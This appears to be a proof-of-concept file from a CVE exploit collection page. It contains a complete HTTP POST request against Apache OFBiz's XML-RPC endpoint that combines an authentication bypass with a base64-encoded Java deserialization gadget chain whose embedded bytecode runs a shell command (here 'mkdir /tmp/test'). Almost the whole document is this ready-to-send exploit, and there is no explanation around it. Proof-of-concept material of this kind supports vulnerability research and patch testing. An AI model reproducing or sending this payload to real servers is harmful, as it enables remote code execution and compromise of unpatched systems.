4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / post.txt TXT
POST /webtools/control/xmlrpc?USERNAME&PASSWORD=mdtest&requirePasswordChange=Y HTTP/1.1
Host: 192.168.1.165:8443
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABuvK/rq+AAAANABeCQAzADQIADUKAAQANgcANwgAOAgAOQkAGwA6CAAdCAA7CgA8AD0KADwAPgcAPwoADABACgAcAEEJABsAQggAQwoAGwBECABFCAAfCQAbAEYIAEcJABsASAcASQoAFwBBCgAXAEoKABcASwcATAcATQEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACGlzU3RhdGljAQADeWVzAQAEZmxhZwEABXN0YXJ0AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEADVN0YWNrTWFwVGFibGUHAE4HAD8BAAY8aW5pdD4HAEwBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwBPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEAEFJ1bnRpbWVFeGVjLmphdmEHAFAMAFEAHgEAAS8MAFIAUwEAEGphdmEvbGFuZy9TdHJpbmcBAAcvYmluL3NoAQACLWMMAB0AHgEAAi9DBwBUDABVAFYMAFcAWAEAE2phdmEvaW8vSU9FeGNlcHRpb24MAFkAIwwAKQAjDAAhAB4BAAtpc1N0YXRpY1llcwwAIgAjAQAPbWtkaXIgL3RtcC90ZXN0DAAfAB4BAANZZXMMACAAHgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABaAFsMAFwAXQEACHJLdXNlUElIAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE1tMamF2YS9sYW5nL1N0cmluZzsBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAAxqYXZhL2lvL0ZpbGUBAAlzZXBhcmF0b3IBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD3ByaW50U3RhY2tUcmFjZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsAIQAbABwAAAAEAAoAHQAeAAAACgAfAB4AAAAKACAAHgAAAAoAIQAeAAAABQAJACIAIwABACQAAACZAAQAAgAAAEmyAAESArYAA5kAGwa9AARZAxIFU1kEEgZTWQWyAAdTS6cAGAa9AARZAxIIU1kEEglTWQWyAAdTS7gACiq2AAtXpwAITCu2AA2xAAEAOABAAEMADAACACUAAAAiAAgAAAAWAAsAFwAjABkAOAAdAEAAIABDAB4ARAAfAEgAIQAmAAAADgAEI/wAFAcAJ0oHACgEAAEAKQAjAAEAJAAAAEkAAgABAAAAEyq3AA6yAA8SELYAA5oABrgAEbEAAAACACUAAAASAAQAAAAnAAQAKAAPACkAEgAqACYAAAAMAAH/ABIAAQcAKgAAAAEAKwAsAAIAJAAAABkAAAADAAAAAbEAAAABACUAAAAGAAEAAAAtAC0AAAAEAAEALgABACsALwACACQAAAAZAAAABAAAAAGxAAAAAQAlAAAABgABAAAAMAAtAAAABAABAC4ACAAwACMAAQAkAAAAcAACAAAAAAA3EhKzAAcSE7MAFBIVswAWuwAXWbcAGLIAFLYAGbIAFrYAGbYAGrMAD7IADxIQtgADmQAGuAARsQAAAAIAJQAAAB4ABwAAABAABQARAAoAEgAPACMAKAAkADMAJQA2ACYAJgAAAAMAATYAAQAxAAAAAgAydXIAAltCrPMX+AYIVOACAAB4cAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAIRVFQWlZQSkJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>